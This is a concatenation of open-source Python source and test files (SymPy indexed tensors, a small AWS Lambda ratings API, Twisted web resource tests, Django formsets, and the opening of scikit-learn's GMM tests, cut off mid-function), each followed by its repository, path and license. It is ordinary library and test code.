>>> q = Indexed('A', i, j, k, l, m)
>>> q.rank
5
>>> q.rank == len(q.indices)
True
"""
return len(self.args) - 1
@property
def shape(self):
"""Returns a list with dimensions of each index.
Dimensions is a property of the array, not of the indices. Still, if
the IndexedBase does not define a shape attribute, it is assumed that
the ranges of the indices correspond to the shape of the array.
>>> from sympy.tensor.indexed import IndexedBase, Idx
>>> from sympy import symbols
>>> n, m = symbols('n m', integer=True)
>>> i = Idx('i', m)
>>> j = Idx('j', m)
>>> A = IndexedBase('A', shape=(n, n))
>>> B = IndexedBase('B')
>>> A[i, j].shape
(n, n)
>>> B[i, j].shape
(m, m)
"""
from sympy.utilities.misc import filldedent
if self.base.shape:
return self.base.shape
try:
return Tuple(*[i.upper - i.lower + 1 for i in self.indices])
except AttributeError:
raise IndexException(filldedent("""
Range is not defined for all indices in: %s""" % self))
except TypeError:
raise IndexException(filldedent("""
Shape cannot be inferred from Idx with
undefined range: %s""" % self))
@property
def ranges(self):
"""Returns a list of tuples with lower and upper range of each index.
If an index does not define the data members upper and lower, the
corresponding slot in the list contains ``None`` instead of a tuple.
Examples
========
>>> from sympy import Indexed,Idx, symbols
>>> Indexed('A', Idx('i', 2), Idx('j', 4), Idx('k', 8)).ranges
[(0, 1), (0, 3), (0, 7)]
>>> Indexed('A', Idx('i', 3), Idx('j', 3), Idx('k', 3)).ranges
[(0, 2), (0, 2), (0, 2)]
>>> x, y, z = symbols('x y z', integer=True)
>>> Indexed('A', x, y, z).ranges
[None, None, None]
"""
ranges = []
for i in self.indices:
try:
ranges.append(Tuple(i.lower, i.upper))
except AttributeError:
ranges.append(None)
return ranges
def _sympystr(self, p):
indices = list(map(p.doprint, self.indices))
return "%s[%s]" % (p.doprint(self.base), ", ".join(indices))
class IndexedBase(Expr, NotIterable):
"""Represent the base or stem of an indexed object
The IndexedBase class represent an array that contains elements. The main purpose
of this class is to allow the convenient creation of objects of the Indexed
class. The __getitem__ method of IndexedBase returns an instance of
Indexed. Alone, without indices, the IndexedBase class can be used as a
notation for e.g. matrix equations, resembling what you could do with the
Symbol class. But, the IndexedBase class adds functionality that is not
available for Symbol instances:
- An IndexedBase object can optionally store shape information. This can
be used in to check array conformance and conditions for numpy
broadcasting. (TODO)
- An IndexedBase object implements syntactic sugar that allows easy symbolic
representation of array operations, using implicit summation of
repeated indices.
- The IndexedBase object symbolizes a mathematical structure equivalent
to arrays, and is recognized as such for code generation and automatic
compilation and wrapping.
>>> from sympy.tensor import IndexedBase, Idx
>>> from sympy import symbols
>>> A = IndexedBase('A'); A
A
>>> type(A)
<class 'sympy.tensor.indexed.IndexedBase'>
When an IndexedBase object receives indices, it returns an array with named
axes, represented by an Indexed object:
>>> i, j = symbols('i j', integer=True)
>>> A[i, j, 2]
A[i, j, 2]
>>> type(A[i, j, 2])
<class 'sympy.tensor.indexed.Indexed'>
The IndexedBase constructor takes an optional shape argument. If given,
it overrides any shape information in the indices. (But not the index
ranges!)
>>> m, n, o, p = symbols('m n o p', integer=True)
>>> i = Idx('i', m)
>>> j = Idx('j', n)
>>> A[i, j].shape
(m, n)
>>> B = IndexedBase('B', shape=(o, p))
>>> B[i, j].shape
(o, p)
"""
is_commutative = True
def __new__(cls, label, shape=None, **kw_args):
if isinstance(label, string_types):
label = Symbol(label)
elif isinstance(label, Symbol):
pass
else:
raise TypeError("Base label should be a string or Symbol.")
if is_sequence(shape):
shape = Tuple(*shape)
else:
shape = sympify(shape)
if shape is not None:
obj = Expr.__new__(cls, label, shape, **kw_args)
else:
obj = Expr.__new__(cls, label, **kw_args)
obj._shape = shape
return obj
def __getitem__(self, indices, **kw_args):
if is_sequence(indices):
# Special case needed because M[*my_tuple] is a syntax error.
if self.shape and len(self.shape) != len(indices):
raise IndexException("Rank mismatch.")
return Indexed(self, *indices, **kw_args)
else:
if self.shape and len(self.shape) != 1:
raise IndexException("Rank mismatch.")
return Indexed(self, indices, **kw_args)
@property
def shape(self):
"""Returns the shape of the IndexedBase object.
Examples
========
>>> from sympy import IndexedBase, Idx, Symbol
>>> from sympy.abc import x, y
>>> IndexedBase('A', shape=(x, y)).shape
(x, y)
Note: If the shape of the IndexedBase is specified, it will override
any shape information given by the indices.
>>> A = IndexedBase('A', shape=(x, y))
>>> B = IndexedBase('B')
>>> i = Idx('i', 2)
>>> j = Idx('j', 1)
>>> A[i, j].shape
(x, y)
>>> B[i, j].shape
(2, 1)
"""
return self._shape
@property
def label(self):
"""Returns the label of the IndexedBase object.
Examples
========
>>> from sympy import IndexedBase
>>> from sympy.abc import x, y
>>> IndexedBase('A', shape=(x, y)).label
A
"""
return self.args[0]
def _sympystr(self, p):
return p.doprint(self.label)
class Idx(Expr):
"""Represents an integer index as an Integer or integer expression.
There are a number of ways to create an Idx object. The constructor
takes two arguments:
``label``
An integer or a symbol that labels the index.
``range``
Optionally you can specify a range as either
- Symbol or integer: This is interpreted as a dimension. Lower and
upper bounds are set to 0 and range - 1, respectively.
- tuple: The two elements are interpreted as the lower and upper
bounds of the range, respectively.
Note: the Idx constructor is rather pedantic in that it only accepts
integer arguments. The only exception is that you can use oo and -oo to
specify an unbounded range. For all other cases, both label and bounds
must be declared as integers, e.g. if n is given as an argument then
n.is_integer must return True.
For convenience, if the label is given as a string it is automatically
converted to an integer symbol. (Note: this conversion is not done for
range or dimension arguments.)
Examples
========
>>> from sympy.tensor import Idx
>>> from sympy import symbols, oo
>>> n, i, L, U = symbols('n i L U', integer=True)
If a string is given for the label an integer Symbol is created and the
bounds are both None:
>>> idx = Idx('qwerty'); idx
qwerty
>>> idx.lower, idx.upper
(None, None)
Both upper and lower bounds can be specified:
>>> idx = Idx(i, (L, U)); idx
i
>>> idx.lower, idx.upper
(L, U)
When only a single bound is given it is interpreted as the dimension
and the lower bound defaults to 0:
>>> idx = Idx(i, n); idx.lower, idx.upper
(0, n - 1)
>>> idx = Idx(i, 4); idx.lower, idx.upper
(0, 3)
>>> idx = Idx(i, oo); idx.lower, idx.upper
(0, oo)
"""
is_integer = True
def __new__(cls, label, range=None, **kw_args):
from sympy.utilities.misc import filldedent
if isinstance(label, string_types):
label = Symbol(label, integer=True)
label, range = list(map(sympify, (label, range)))
if label.is_Number:
if not label.is_integer:
raise TypeError("Index is not an integer number.")
return label
if not label.is_integer:
raise TypeError("Idx object requires an integer label.")
elif is_sequence(range):
if len(range) != 2:
raise ValueError(filldedent("""
Idx range tuple must have length 2, but got %s""" % len(range)))
for bound in range:
if not (bound.is_integer or abs(bound) is S.Infinity):
raise TypeError("Idx object requires integer bounds.")
args = label, Tuple(*range)
elif isinstance(range, Expr):
if not (range.is_integer or range is S.Infinity):
raise TypeError("Idx object requires an integer dimension.")
args = label, Tuple(0, range - 1)
elif range:
raise TypeError(filldedent("""
The range must be an ordered iterable or
integer SymPy expression."""))
else:
args = label,
obj = Expr.__new__(cls, *args, **kw_args)
return obj
@property
def label(self):
"""Returns the label (Integer or integer expression) of the Idx object.
Examples
========
>>> from sympy import Idx, Symbol
>>> x = Symbol('x', integer=True)
>>> Idx(x).label
x
>>> j = Symbol('j', integer=True)
>>> Idx(j).label
j
>>> Idx(j + 1).label
j + 1
"""
return self.args[0]
@property
def lower(self):
"""Returns the lower bound of the Index.
Examples
========
>>> from sympy import Idx
>>> Idx('j', 2).lower
0
>>> Idx('j', 5).lower
0
>>> Idx('j').lower is None
True
"""
try:
return self.args[1][0]
except IndexError:
return
@property
def upper(self):
"""Returns the upper bound of the Index.
Examples
========
>>> from sympy import Idx
>>> Idx('j', 2).upper
1
>>> Idx('j', 5).upper
4
>>> Idx('j').upper is None
True
"""
try:
return self.args[1][1]
except IndexError:
return
def _sympystr(self, p):
return p.doprint(self.label)
|
bsd-3-clause
|
Vilsepi/infinimonkey
|
backend/ratings-api.py
|
1
|
1556
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
import json
import boto3
table = boto3.resource("dynamodb").Table(os.environ.get("RAMBLINGS_TABLE_NAME"))
# def update_item_rating(vote):
# table.update_item(
# Key={
# 'username': 'janedoe',
# 'last_name': 'Doe'
# },
# UpdateExpression='SET age = :val1',
# ExpressionAttributeValues={
# ':val1': 26
# }
# )
def update_rating(event, context):
print(event)
#update_item_rating("VOTE_UP")
return {
"statusCode": 200,
"body": "{\"vote\": \"ok\"}",
"headers": {"Access-Control-Allow-Origin": "*"}
}
def update_rating(event, context):
rambling_id = event.get("pathParameters", {}).get("id")
vote = event.get("pathParameters", {}).get("vote")
if vote in ["vote_up", "vote_down"]:
_dynamo_update_field(rambling_id, vote, 1)
return {
"statusCode": 200,
"body": "{\"vote\": \"ok\"}",
"headers": {"Access-Control-Allow-Origin": "*"}
}
def _dynamo_update_field(id, field, value):
table.update_item(
Key={"id": id},
UpdateExpression="SET {} = :val1".format(field),
ExpressionAttributeValues={":val1": value}
#--update-expression "SET Price = Price + :incr" \
#--expression-attribute-values '{":incr":{"N":"5"}}' \
)
apiUpdateRating:
handler: ramblings-api.update_rating
memorySize: 256
events:
- http:
path: ramblings/{id}/ratings/{vote}
method: post
cors: true
|
mit
|
demarle/VTK
|
ThirdParty/Twisted/twisted/web/test/test_resource.py
|
43
|
8158
|
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Tests for L{twisted.web.resource}.
"""
from twisted.trial.unittest import TestCase
from twisted.web.error import UnsupportedMethod
from twisted.web.resource import (
NOT_FOUND, FORBIDDEN, Resource, ErrorPage, NoResource, ForbiddenResource,
getChildForRequest)
from twisted.web.test.requesthelper import DummyRequest
class ErrorPageTests(TestCase):
"""
Tests for L{ErrorPage}, L{NoResource}, and L{ForbiddenResource}.
"""
errorPage = ErrorPage
noResource = NoResource
forbiddenResource = ForbiddenResource
def test_getChild(self):
"""
The C{getChild} method of L{ErrorPage} returns the L{ErrorPage} it is
called on.
"""
page = self.errorPage(321, "foo", "bar")
self.assertIdentical(page.getChild(b"name", object()), page)
def _pageRenderingTest(self, page, code, brief, detail):
request = DummyRequest([b''])
template = (
u"\n"
u"<html>\n"
u" <head><title>%s - %s</title></head>\n"
u" <body>\n"
u" <h1>%s</h1>\n"
u" <p>%s</p>\n"
u" </body>\n"
u"</html>\n")
expected = template % (code, brief, brief, detail)
self.assertEqual(
page.render(request), expected.encode('utf-8'))
self.assertEqual(request.responseCode, code)
self.assertEqual(
request.outgoingHeaders,
{b'content-type': b'text/html; charset=utf-8'})
def test_errorPageRendering(self):
"""
L{ErrorPage.render} returns a C{bytes} describing the error defined by
the response code and message passed to L{ErrorPage.__init__}. It also
uses that response code to set the response code on the L{Request}
passed in.
"""
code = 321
brief = "brief description text"
detail = "much longer text might go here"
page = self.errorPage(code, brief, detail)
self._pageRenderingTest(page, code, brief, detail)
def test_noResourceRendering(self):
"""
L{NoResource} sets the HTTP I{NOT FOUND} code.
"""
detail = "long message"
page = self.noResource(detail)
self._pageRenderingTest(page, NOT_FOUND, "No Such Resource", detail)
def test_forbiddenResourceRendering(self):
"""
L{ForbiddenResource} sets the HTTP I{FORBIDDEN} code.
"""
detail = "longer message"
page = self.forbiddenResource(detail)
self._pageRenderingTest(page, FORBIDDEN, "Forbidden Resource", detail)
class DynamicChild(Resource):
"""
A L{Resource} to be created on the fly by L{DynamicChildren}.
"""
def __init__(self, path, request):
Resource.__init__(self)
self.path = path
self.request = request
class DynamicChildren(Resource):
"""
A L{Resource} with dynamic children.
"""
def getChild(self, path, request):
return DynamicChild(path, request)
class BytesReturnedRenderable(Resource):
"""
A L{Resource} with minimal capabilities to render a response.
"""
def __init__(self, response):
"""
@param response: A C{bytes} object giving the value to return from
C{render_GET}.
"""
Resource.__init__(self)
self._response = response
def render_GET(self, request):
"""
Render a response to a I{GET} request by returning a short byte string
to be written by the server.
"""
return self._response
class ImplicitAllowedMethods(Resource):
"""
A L{Resource} which implicitly defines its allowed methods by defining
renderers to handle them.
"""
def render_GET(self, request):
pass
def render_PUT(self, request):
pass
class ResourceTests(TestCase):
"""
Tests for L{Resource}.
"""
def test_staticChildren(self):
"""
L{Resource.putChild} adds a I{static} child to the resource. That child
is returned from any call to L{Resource.getChildWithDefault} for the
child's path.
"""
resource = Resource()
child = Resource()
sibling = Resource()
resource.putChild(b"foo", child)
resource.putChild(b"bar", sibling)
self.assertIdentical(
child, resource.getChildWithDefault(b"foo", DummyRequest([])))
def test_dynamicChildren(self):
"""
L{Resource.getChildWithDefault} delegates to L{Resource.getChild} when
the requested path is not associated with any static child.
"""
path = b"foo"
request = DummyRequest([])
resource = DynamicChildren()
child = resource.getChildWithDefault(path, request)
self.assertIsInstance(child, DynamicChild)
self.assertEqual(child.path, path)
self.assertIdentical(child.request, request)
def test_defaultHEAD(self):
"""
When not otherwise overridden, L{Resource.render} treats a I{HEAD}
request as if it were a I{GET} request.
"""
expected = b"insert response here"
request = DummyRequest([])
request.method = b'HEAD'
resource = BytesReturnedRenderable(expected)
self.assertEqual(expected, resource.render(request))
def test_explicitAllowedMethods(self):
"""
The L{UnsupportedMethod} raised by L{Resource.render} for an unsupported
request method has a C{allowedMethods} attribute set to the value of the
C{allowedMethods} attribute of the L{Resource}, if it has one.
"""
expected = [b'GET', b'HEAD', b'PUT']
resource = Resource()
resource.allowedMethods = expected
request = DummyRequest([])
request.method = b'FICTIONAL'
exc = self.assertRaises(UnsupportedMethod, resource.render, request)
self.assertEqual(set(expected), set(exc.allowedMethods))
def test_implicitAllowedMethods(self):
"""
The L{UnsupportedMethod} raised by L{Resource.render} for an unsupported
request method has a C{allowedMethods} attribute set to a list of the
methods supported by the L{Resource}, as determined by the
I{render_}-prefixed methods which it defines, if C{allowedMethods} is
not explicitly defined by the L{Resource}.
"""
expected = set([b'GET', b'HEAD', b'PUT'])
resource = ImplicitAllowedMethods()
request = DummyRequest([])
request.method = b'FICTIONAL'
exc = self.assertRaises(UnsupportedMethod, resource.render, request)
self.assertEqual(expected, set(exc.allowedMethods))
class GetChildForRequestTests(TestCase):
"""
Tests for L{getChildForRequest}.
"""
def test_exhaustedPostPath(self):
"""
L{getChildForRequest} returns whatever resource has been reached by the
time the request's C{postpath} is empty.
"""
request = DummyRequest([])
resource = Resource()
result = getChildForRequest(resource, request)
self.assertIdentical(resource, result)
def test_leafResource(self):
"""
L{getChildForRequest} returns the first resource it encounters with a
C{isLeaf} attribute set to C{True}.
"""
request = DummyRequest([b"foo", b"bar"])
resource = Resource()
resource.isLeaf = True
result = getChildForRequest(resource, request)
self.assertIdentical(resource, result)
def test_postPathToPrePath(self):
"""
As path segments from the request are traversed, they are taken from
C{postpath} and put into C{prepath}.
"""
request = DummyRequest([b"foo", b"bar"])
root = Resource()
child = Resource()
child.isLeaf = True
root.putChild(b"foo", child)
self.assertIdentical(child, getChildForRequest(root, request))
self.assertEqual(request.prepath, [b"foo"])
self.assertEqual(request.postpath, [b"bar"])
|
bsd-3-clause
|
hcsturix74/django
|
django/forms/formsets.py
|
362
|
17988
|
from __future__ import unicode_literals
from django.core.exceptions import ValidationError
from django.forms import Form
from django.forms.fields import BooleanField, IntegerField
from django.forms.utils import ErrorList
from django.forms.widgets import HiddenInput
from django.utils import six
from django.utils.encoding import python_2_unicode_compatible
from django.utils.functional import cached_property
from django.utils.html import html_safe
from django.utils.safestring import mark_safe
from django.utils.six.moves import range
from django.utils.translation import ugettext as _, ungettext
__all__ = ('BaseFormSet', 'formset_factory', 'all_valid')
# special field names
TOTAL_FORM_COUNT = 'TOTAL_FORMS'
INITIAL_FORM_COUNT = 'INITIAL_FORMS'
MIN_NUM_FORM_COUNT = 'MIN_NUM_FORMS'
MAX_NUM_FORM_COUNT = 'MAX_NUM_FORMS'
ORDERING_FIELD_NAME = 'ORDER'
DELETION_FIELD_NAME = 'DELETE'
# default minimum number of forms in a formset
DEFAULT_MIN_NUM = 0
# default maximum number of forms in a formset, to prevent memory exhaustion
DEFAULT_MAX_NUM = 1000
class ManagementForm(Form):
"""
``ManagementForm`` is used to keep track of how many form instances
are displayed on the page. If adding new forms via javascript, you should
increment the count field of this form as well.
"""
def __init__(self, *args, **kwargs):
self.base_fields[TOTAL_FORM_COUNT] = IntegerField(widget=HiddenInput)
self.base_fields[INITIAL_FORM_COUNT] = IntegerField(widget=HiddenInput)
# MIN_NUM_FORM_COUNT and MAX_NUM_FORM_COUNT are output with the rest of
# the management form, but only for the convenience of client-side
# code. The POST value of them returned from the client is not checked.
self.base_fields[MIN_NUM_FORM_COUNT] = IntegerField(required=False, widget=HiddenInput)
self.base_fields[MAX_NUM_FORM_COUNT] = IntegerField(required=False, widget=HiddenInput)
super(ManagementForm, self).__init__(*args, **kwargs)
@html_safe
@python_2_unicode_compatible
class BaseFormSet(object):
"""
A collection of instances of the same Form class.
"""
def __init__(self, data=None, files=None, auto_id='id_%s', prefix=None,
initial=None, error_class=ErrorList, form_kwargs=None):
self.is_bound = data is not None or files is not None
self.prefix = prefix or self.get_default_prefix()
self.auto_id = auto_id
self.data = data or {}
self.files = files or {}
self.initial = initial
self.form_kwargs = form_kwargs or {}
self.error_class = error_class
self._errors = None
self._non_form_errors = None
def __str__(self):
return self.as_table()
def __iter__(self):
"""Yields the forms in the order they should be rendered"""
return iter(self.forms)
def __getitem__(self, index):
"""Returns the form at the given index, based on the rendering order"""
return self.forms[index]
def __len__(self):
return len(self.forms)
def __bool__(self):
"""All formsets have a management form which is not included in the length"""
return True
def __nonzero__(self): # Python 2 compatibility
return type(self).__bool__(self)
@property
def management_form(self):
"""Returns the ManagementForm instance for this FormSet."""
if self.is_bound:
form = ManagementForm(self.data, auto_id=self.auto_id, prefix=self.prefix)
if not form.is_valid():
raise ValidationError(
_('ManagementForm data is missing or has been tampered with'),
code='missing_management_form',
)
else:
form = ManagementForm(auto_id=self.auto_id, prefix=self.prefix, initial={
TOTAL_FORM_COUNT: self.total_form_count(),
INITIAL_FORM_COUNT: self.initial_form_count(),
MIN_NUM_FORM_COUNT: self.min_num,
MAX_NUM_FORM_COUNT: self.max_num
})
return form
def total_form_count(self):
"""Returns the total number of forms in this FormSet."""
if self.is_bound:
# return absolute_max if it is lower than the actual total form
# count in the data; this is DoS protection to prevent clients
# from forcing the server to instantiate arbitrary numbers of
# forms
return min(self.management_form.cleaned_data[TOTAL_FORM_COUNT], self.absolute_max)
else:
initial_forms = self.initial_form_count()
total_forms = max(initial_forms, self.min_num) + self.extra
# Allow all existing related objects/inlines to be displayed,
# but don't allow extra beyond max_num.
if initial_forms > self.max_num >= 0:
total_forms = initial_forms
elif total_forms > self.max_num >= 0:
total_forms = self.max_num
return total_forms
def initial_form_count(self):
"""Returns the number of forms that are required in this FormSet."""
if self.is_bound:
return self.management_form.cleaned_data[INITIAL_FORM_COUNT]
else:
# Use the length of the initial data if it's there, 0 otherwise.
initial_forms = len(self.initial) if self.initial else 0
return initial_forms
@cached_property
def forms(self):
"""
Instantiate forms at first property access.
"""
# DoS protection is included in total_form_count()
forms = [self._construct_form(i, **self.get_form_kwargs(i))
for i in range(self.total_form_count())]
return forms
def get_form_kwargs(self, index):
"""
Return additional keyword arguments for each individual formset form.
index will be None if the form being constructed is a new empty
form.
"""
return self.form_kwargs.copy()
def _construct_form(self, i, **kwargs):
"""
Instantiates and returns the i-th form instance in a formset.
"""
defaults = {
'auto_id': self.auto_id,
'prefix': self.add_prefix(i),
'error_class': self.error_class,
}
if self.is_bound:
defaults['data'] = self.data
defaults['files'] = self.files
if self.initial and 'initial' not in kwargs:
try:
defaults['initial'] = self.initial[i]
except IndexError:
pass
# Allow extra forms to be empty, unless they're part of
# the minimum forms.
if i >= self.initial_form_count() and i >= self.min_num:
defaults['empty_permitted'] = True
defaults.update(kwargs)
form = self.form(**defaults)
self.add_fields(form, i)
return form
@property
def initial_forms(self):
"""Return a list of all the initial forms in this formset."""
return self.forms[:self.initial_form_count()]
@property
def extra_forms(self):
"""Return a list of all the extra forms in this formset."""
return self.forms[self.initial_form_count():]
@property
def empty_form(self):
form = self.form(
auto_id=self.auto_id,
prefix=self.add_prefix('__prefix__'),
empty_permitted=True,
**self.get_form_kwargs(None)
)
self.add_fields(form, None)
return form
@property
def cleaned_data(self):
"""
Returns a list of form.cleaned_data dicts for every form in self.forms.
"""
if not self.is_valid():
raise AttributeError("'%s' object has no attribute 'cleaned_data'" % self.__class__.__name__)
return [form.cleaned_data for form in self.forms]
@property
def deleted_forms(self):
"""
Returns a list of forms that have been marked for deletion.
"""
if not self.is_valid() or not self.can_delete:
return []
# construct _deleted_form_indexes which is just a list of form indexes
# that have had their deletion widget set to True
if not hasattr(self, '_deleted_form_indexes'):
self._deleted_form_indexes = []
for i in range(0, self.total_form_count()):
form = self.forms[i]
# if this is an extra form and hasn't changed, don't consider it
if i >= self.initial_form_count() and not form.has_changed():
continue
if self._should_delete_form(form):
self._deleted_form_indexes.append(i)
return [self.forms[i] for i in self._deleted_form_indexes]
@property
def ordered_forms(self):
"""
Returns a list of form in the order specified by the incoming data.
Raises an AttributeError if ordering is not allowed.
"""
if not self.is_valid() or not self.can_order:
raise AttributeError("'%s' object has no attribute 'ordered_forms'" % self.__class__.__name__)
# Construct _ordering, which is a list of (form_index, order_field_value)
# tuples. After constructing this list, we'll sort it by order_field_value
# so we have a way to get to the form indexes in the order specified
# by the form data.
if not hasattr(self, '_ordering'):
self._ordering = []
for i in range(0, self.total_form_count()):
form = self.forms[i]
# if this is an extra form and hasn't changed, don't consider it
if i >= self.initial_form_count() and not form.has_changed():
continue
# don't add data marked for deletion to self.ordered_data
if self.can_delete and self._should_delete_form(form):
continue
self._ordering.append((i, form.cleaned_data[ORDERING_FIELD_NAME]))
# After we're done populating self._ordering, sort it.
# A sort function to order things numerically ascending, but
# None should be sorted below anything else. Allowing None as
# a comparison value makes it so we can leave ordering fields
# blank.
def compare_ordering_key(k):
if k[1] is None:
return (1, 0) # +infinity, larger than any number
return (0, k[1])
self._ordering.sort(key=compare_ordering_key)
# Return a list of form.cleaned_data dicts in the order specified by
# the form data.
return [self.forms[i[0]] for i in self._ordering]
@classmethod
def get_default_prefix(cls):
return 'form'
def non_form_errors(self):
"""
Returns an ErrorList of errors that aren't associated with a particular
form -- i.e., from formset.clean(). Returns an empty ErrorList if there
are none.
"""
if self._non_form_errors is None:
self.full_clean()
return self._non_form_errors
@property
def errors(self):
"""
Returns a list of form.errors for every form in self.forms.
"""
if self._errors is None:
self.full_clean()
return self._errors
def total_error_count(self):
"""
Returns the number of errors across all forms in the formset.
"""
return len(self.non_form_errors()) +\
sum(len(form_errors) for form_errors in self.errors)
def _should_delete_form(self, form):
"""
Returns whether or not the form was marked for deletion.
"""
return form.cleaned_data.get(DELETION_FIELD_NAME, False)
def is_valid(self):
"""
Returns True if every form in self.forms is valid.
"""
if not self.is_bound:
return False
# We loop over every form.errors here rather than short circuiting on the
# first failure to make sure validation gets triggered for every form.
forms_valid = True
# This triggers a full clean.
self.errors
for i in range(0, self.total_form_count()):
form = self.forms[i]
if self.can_delete:
if self._should_delete_form(form):
# This form is going to be deleted so any of its errors
# should not cause the entire formset to be invalid.
continue
forms_valid &= form.is_valid()
return forms_valid and not self.non_form_errors()
def full_clean(self):
"""
Cleans all of self.data and populates self._errors and
self._non_form_errors.
"""
self._errors = []
self._non_form_errors = self.error_class()
if not self.is_bound: # Stop further processing.
return
for i in range(0, self.total_form_count()):
form = self.forms[i]
self._errors.append(form.errors)
try:
if (self.validate_max and
self.total_form_count() - len(self.deleted_forms) > self.max_num) or \
self.management_form.cleaned_data[TOTAL_FORM_COUNT] > self.absolute_max:
raise ValidationError(ungettext(
"Please submit %d or fewer forms.",
"Please submit %d or fewer forms.", self.max_num) % self.max_num,
code='too_many_forms',
)
if (self.validate_min and
self.total_form_count() - len(self.deleted_forms) < self.min_num):
raise ValidationError(ungettext(
"Please submit %d or more forms.",
"Please submit %d or more forms.", self.min_num) % self.min_num,
code='too_few_forms')
# Give self.clean() a chance to do cross-form validation.
self.clean()
except ValidationError as e:
self._non_form_errors = self.error_class(e.error_list)
def clean(self):
"""
Hook for doing any extra formset-wide cleaning after Form.clean() has
been called on every form. Any ValidationError raised by this method
will not be associated with a particular form; it will be accessible
via formset.non_form_errors()
"""
pass
def has_changed(self):
"""
Returns true if data in any form differs from initial.
"""
return any(form.has_changed() for form in self)
def add_fields(self, form, index):
"""A hook for adding extra fields on to each form instance."""
if self.can_order:
# Only pre-fill the ordering field for initial forms.
if index is not None and index < self.initial_form_count():
form.fields[ORDERING_FIELD_NAME] = IntegerField(label=_('Order'), initial=index + 1, required=False)
else:
form.fields[ORDERING_FIELD_NAME] = IntegerField(label=_('Order'), required=False)
if self.can_delete:
form.fields[DELETION_FIELD_NAME] = BooleanField(label=_('Delete'), required=False)
def add_prefix(self, index):
return '%s-%s' % (self.prefix, index)
def is_multipart(self):
"""
Returns True if the formset needs to be multipart, i.e. it
has FileInput. Otherwise, False.
"""
if self.forms:
return self.forms[0].is_multipart()
else:
return self.empty_form.is_multipart()
@property
def media(self):
# All the forms on a FormSet are the same, so you only need to
# interrogate the first form for media.
if self.forms:
return self.forms[0].media
else:
return self.empty_form.media
def as_table(self):
"Returns this formset rendered as HTML <tr>s -- excluding the <table></table>."
# XXX: there is no semantic division between forms here, there
# probably should be. It might make sense to render each form as a
# table row with each field as a td.
forms = ' '.join(form.as_table() for form in self)
return mark_safe('\n'.join([six.text_type(self.management_form), forms]))
def as_p(self):
"Returns this formset rendered as HTML <p>s."
forms = ' '.join(form.as_p() for form in self)
return mark_safe('\n'.join([six.text_type(self.management_form), forms]))
def as_ul(self):
"Returns this formset rendered as HTML <li>s."
forms = ' '.join(form.as_ul() for form in self)
return mark_safe('\n'.join([six.text_type(self.management_form), forms]))
def formset_factory(form, formset=BaseFormSet, extra=1, can_order=False,
can_delete=False, max_num=None, validate_max=False,
min_num=None, validate_min=False):
"""Return a FormSet for the given form class."""
if min_num is None:
min_num = DEFAULT_MIN_NUM
if max_num is None:
max_num = DEFAULT_MAX_NUM
# hard limit on forms instantiated, to prevent memory-exhaustion attacks
# limit is simply max_num + DEFAULT_MAX_NUM (which is 2*DEFAULT_MAX_NUM
# if max_num is None in the first place)
absolute_max = max_num + DEFAULT_MAX_NUM
attrs = {'form': form, 'extra': extra,
'can_order': can_order, 'can_delete': can_delete,
'min_num': min_num, 'max_num': max_num,
'absolute_max': absolute_max, 'validate_min': validate_min,
'validate_max': validate_max}
return type(form.__name__ + str('FormSet'), (formset,), attrs)
def all_valid(formsets):
"""Returns true if every formset in formsets is valid."""
valid = True
for formset in formsets:
if not formset.is_valid():
valid = False
return valid
|
bsd-3-clause
|
hsuantien/scikit-learn
|
sklearn/mixture/tests/test_gmm.py
|
200
|
17427
|
import unittest
import copy
import sys
from nose.tools import assert_true
import numpy as np
from numpy.testing import (assert_array_equal, assert_array_almost_equal,
assert_raises)
from scipy import stats
from sklearn import mixture
from sklearn.datasets.samples_generator import make_spd_matrix
from sklearn.utils.testing import assert_greater
from sklearn.utils.testing import assert_raise_message
from sklearn.metrics.cluster import adjusted_rand_score
from sklearn.externals.six.moves import cStringIO as StringIO
rng = np.random.RandomState(0)
def test_sample_gaussian():
# Test sample generation from mixture.sample_gaussian where covariance
# is diagonal, spherical and full
n_features, n_samples = 2, 300
axis = 1
mu = rng.randint(10) * rng.rand(n_features)
cv = (rng.rand(n_features) + 1.0) ** 2
samples = mixture.sample_gaussian(
mu, cv, covariance_type='diag', n_samples=n_samples)
assert_true(np.allclose(samples.mean(axis), mu, atol=1.3))
assert_true(np.allclose(samples.var(axis), cv, atol=1.5))
# the same for spherical covariances
cv = (rng.rand() + 1.0) ** 2
samples = mixture.sample_gaussian(
mu, cv, covariance_type='spherical', n_samples=n_samples)
assert_true(np.allclose(samples.mean(axis), mu, atol=1.5))
assert_true(np.allclose(
samples.var(axis), np.repeat(cv, n_features), atol=1.5))
# and for full covariances
A = rng.randn(n_features, n_features)
cv = np.dot(A.T, A) + np.eye(n_features)
samples = mixture.sample_gaussian(
mu, cv, covariance_type='full', n_samples=n_samples)
assert_true(np.allclose(samples.mean(axis), mu, atol=1.3))
assert_true(np.allclose(np.cov(samples), cv, atol=2.5))
# Numerical stability check: in SciPy 0.12.0 at least, eigh may return
# tiny negative values in its second return value.
from sklearn.mixture import sample_gaussian
x = sample_gaussian([0, 0], [[4, 3], [1, .1]],
covariance_type='full', random_state=42)
print(x)
assert_true(np.isfinite(x).all())
def _naive_lmvnpdf_diag(X, mu, cv):
# slow and naive implementation of lmvnpdf
ref = np.empty((len(X), len(mu)))
stds = np.sqrt(cv)
for i, (m, std) in enumerate(zip(mu, stds)):
ref[:, i] = np.log(stats.norm.pdf(X, m, std)).sum(axis=1)
return ref
def test_lmvnpdf_diag():
# test a slow and naive implementation of lmvnpdf and
# compare it to the vectorized version (mixture.lmvnpdf) to test
# for correctness
n_features, n_components, n_samples = 2, 3, 10
mu = rng.randint(10) * rng.rand(n_components, n_features)
cv = (rng.rand(n_components, n_features) + 1.0) ** 2
X = rng.randint(10) * rng.rand(n_samples, n_features)
ref = _naive_lmvnpdf_diag(X, mu, cv)
lpr = mixture.log_multivariate_normal_density(X, mu, cv, 'diag')
assert_array_almost_equal(lpr, ref)
def test_lmvnpdf_spherical():
n_features, n_components, n_samples = 2, 3, 10
mu = rng.randint(10) * rng.rand(n_components, n_features)
spherecv = rng.rand(n_components, 1) ** 2 + 1
X = rng.randint(10) * rng.rand(n_samples, n_features)
cv = np.tile(spherecv, (n_features, 1))
reference = _naive_lmvnpdf_diag(X, mu, cv)
lpr = mixture.log_multivariate_normal_density(X, mu, spherecv,
'spherical')
assert_array_almost_equal(lpr, reference)
def test_lmvnpdf_full():
n_features, n_components, n_samples = 2, 3, 10
mu = rng.randint(10) * rng.rand(n_components, n_features)
cv = (rng.rand(n_components, n_features) + 1.0) ** 2
